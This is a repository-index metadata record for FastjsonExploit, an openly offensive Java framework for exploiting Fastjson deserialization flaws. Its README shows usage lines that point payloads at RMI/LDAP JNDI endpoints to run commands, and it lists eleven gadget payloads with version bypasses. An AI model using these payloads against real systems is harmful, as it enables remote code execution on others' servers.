{"id":13539188,"url":"https://github.com/c0ny1/fastjsonexploit","last_synced_at":"2025-05-16T10:07:43.199Z","repository":{"id":37745782,"uuid":"197881741","full_name":"c0ny1/FastjsonExploit","owner":"c0ny1","description":"Fastjson vulnerability quickly exploits the framework(fastjson漏洞快速利用框架)","archived":false,"fork":false,"pushed_at":"2022-12-16T03:56:54.000Z","size":16216,"stargazers_count":1315,"open_issues_count":8,"forks_count":175,"subscribers_count":14,"default_branch":"master","last_synced_at":"2025-04-09T04:07:51.067Z","etag":null,"topics":["exp","exploiting-vulnerabilities","fastjson","poc"],"latest_commit_sha":null,"homepage":"","language":"Java","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/c0ny1.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2019-07-20T04:55:57.000Z","updated_at":"2025-04-06T16:33:15.000Z","dependencies_parsed_at":"2023-01-29T08:10:11.321Z","dependency_job_id":null,"html_url":"https://github.com/c0ny1/FastjsonExploit","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/c0ny1%2FFastjsonExploit","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/c0ny1%2FFastjsonExploit/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/c0ny1%2FFastjsonExploit/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/c0ny1%2FFastjsonExploit/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/c0ny1","download_url":"https://codeload.github.com/c0ny1/FastjsonExploit/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254509476,"owners_count":22082891,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["exp","exploiting-vulnerabilities","fastjson","poc"],"created_at":"2024-08-01T09:01:21.446Z","updated_at":"2025-05-16T10:07:38.190Z","avatar_url":"https://github.com/c0ny1.png","language":"Java","funding_links":[],"categories":["\u003ca id=\"683b645c2162a1fce5f24ac2abfa1973\"\u003e\u003c/a\u003e漏洞\u0026\u0026漏洞管理\u0026\u0026漏洞发现/挖掘\u0026\u0026漏洞开发\u0026\u0026漏洞利用\u0026\u0026Fuzzing"],"sub_categories":["\u003ca id=\"41ae40ed61ab2b61f2971fea3ec26e7c\"\u003e\u003c/a\u003e漏洞利用"],"readme":"# FastjonExploit | Fastjson漏洞快速利用框架\n\n## 0x01 Introduce\n\nFastjsonExploit是一个Fastjson漏洞快速漏洞利用框架,主要功能如下:\n\n1. 一键生成利用payload,并启动所有利用环境。\n2. 管理Fastjson各种payload(当然是立志整理所有啦,目前6个类,共11种利用及绕过)\n\n## 0x02 Buiding\n\nRequires Java 1.7+ and Maven 3.x+\n\n```mvn clean package -DskipTests```\n\n## 0x03 Usage\n\n```\n\n\n.---- -. -. . . .\n ( .',----- - - ' '\n \\_/ ;--:-\\ __--------------------__\n __U__n_^_''__[. |ooo___ | |_!_||_!_||_!_||_!_| |\n c(_ ..(_ ..(_ ..( /,,,,,,] | |___||___||___||___| |\n ,_\\___________'_|,L______],|______________________|\n/;_(@)(@)==(@)(@) (o)(o) (o)^(o)--(o)^(o)\n\nFastjsonExploit is a Fastjson library vulnerability exploit framework\n Author:c0ny1\u003croot@gv7.me\u003e\n\n\nUsage: java -jar Fastjson-[version]-all.jar [payload] [option] [command]\nExp01: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 rmi://127.0.0.1:1099/Exploit \"cmd:calc\"\nExp02: java -jar FastjsonExploit-[version].jar JdbcRowSetImpl1 ldap://127.0.0.1:1232/Exploit \"code:custom_code.java\"\nExp03: java -jar FastjsonExploit-[version].jar TemplatesImpl1 \"cmd:calc\"\nExp04: java -jar FastjsonExploit-[version].jar TemplatesImpl1 \"code:custom_code.java\"\n\nAvailable payload types:\n Payload PayloadType VulVersion Dependencies \n ------- ----------- ---------- ------------ \n BasicDataSource1 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4\n BasicDataSource2 local 1.2.2.1-1.2.2.4 tomcat-dbcp:7.x, tomcat-dbcp:9.x, commons-dbcp:1.4\n JdbcRowSetImpl1 jndi 1.2.2.1-1.2.2.4 \n JdbcRowSetImpl2 jndi 1.2.2.1-1.2.4.1 Fastjson 1.2.41 bypass \n JdbcRowSetImpl3 jndi 1.2.2.1-1.2.4.3 Fastjson 1.2.43 bypass \n JdbcRowSetImpl4 jndi 1.2.2.1-1.2.4.2 Fastjson 1.2.42 bypass \n JdbcRowSetImpl5 jndi 1.2.2.1-1.2.4.7 Fastjson 1.2.47 bypass \n JndiDataSourceFactory1 jndi 1.2.2.1-1.2.2.4 ibatis-core:3.0 \n SimpleJndiBeanFactory1 jndi 1.2.2.2-1.2.2.4 spring-context:4.3.7.RELEASE \n TemplatesImpl1 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField) \n TemplatesImpl2 local 1.2.2.1-1.2.2.4 xalan:2.7.2(need Feature.SupportNonPublicField) \n```\n\n## 0x04 Notice\n* 帮助信息所说明的payload可利用的Fastjson版本,不一定正确。后续测试更正!\n\n## 0x05 Reference\n* https://github.com/frohoff/ysoserial\n* https://github.com/mbechler/marshalsec\n* https://github.com/kxcode/JNDI-Exploit-Bypass-Demo","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fc0ny1%2Ffastjsonexploit","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fc0ny1%2Ffastjsonexploit","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fc0ny1%2Ffastjsonexploit/lists"}